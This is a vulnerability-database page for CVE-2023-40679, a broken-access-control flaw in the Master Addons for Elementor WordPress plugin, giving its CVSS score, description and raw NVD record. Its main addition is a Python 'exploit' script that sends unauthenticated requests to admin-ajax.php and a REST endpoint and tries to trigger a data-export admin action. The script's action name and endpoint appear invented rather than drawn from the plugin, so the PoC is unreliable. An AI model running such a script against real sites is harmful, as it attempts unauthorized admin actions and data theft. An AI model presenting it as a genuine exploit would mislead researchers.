Security Vulnerability Report
中文
CVE-2023-40679 CVSS 6.5 MEDIUM

CVE-2023-40679

Published: 2025-12-24 13:16:06
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Jewel Theme Master Addons for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Master Addons for Elementor: from n/a through 2.0.5.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Master Addons for Elementor <= 2.0.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-40679 PoC - Master Addons for Elementor Broken Access Control # This PoC demonstrates unauthorized access to admin functions import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """Check if the target is vulnerable to CVE-2023-40679""" # Test endpoint that should require authorization # Based on the vulnerability, admin-ajax.php or REST API endpoints # are accessible without proper capability checks endpoints_to_test = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/master-addons/v1/export-data" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } for endpoint in endpoints_to_test: try: # Send request without authentication response = requests.post(endpoint, headers=headers, timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200: print(f"[+] Potential vulnerability found at: {endpoint}") print(f"[+] Response: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") return False def exploit_unauthorized_access(): """Attempt to exploit the missing authorization vulnerability""" # Craft malicious request to trigger unauthorized admin action exploit_data = { "action": "master_addons_exploit_action", "nonce": "", "sub_action": "export_all_data" } response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_data, headers={"User-Agent": "Mozilla/5.0"}, timeout=10 ) print(f"[*] Exploit response status: {response.status_code}") print(f"[*] Response content: {response.text[:500]}") if __name__ == "__main__": print("[*] CVE-2023-40679 - Master Addons for Elementor Exploit") if check_vulnerability(): print("[!] Target appears to be vulnerable!") exploit_unauthorized_access() else: print("[-] Target does not appear to be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-40679", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:05.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Jewel Theme Master Addons for Elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Master Addons for Elementor: from n/a through 2.0.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/master-addons/vulnerability/wordpress-master-elementor-addons-plugin-2-0-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}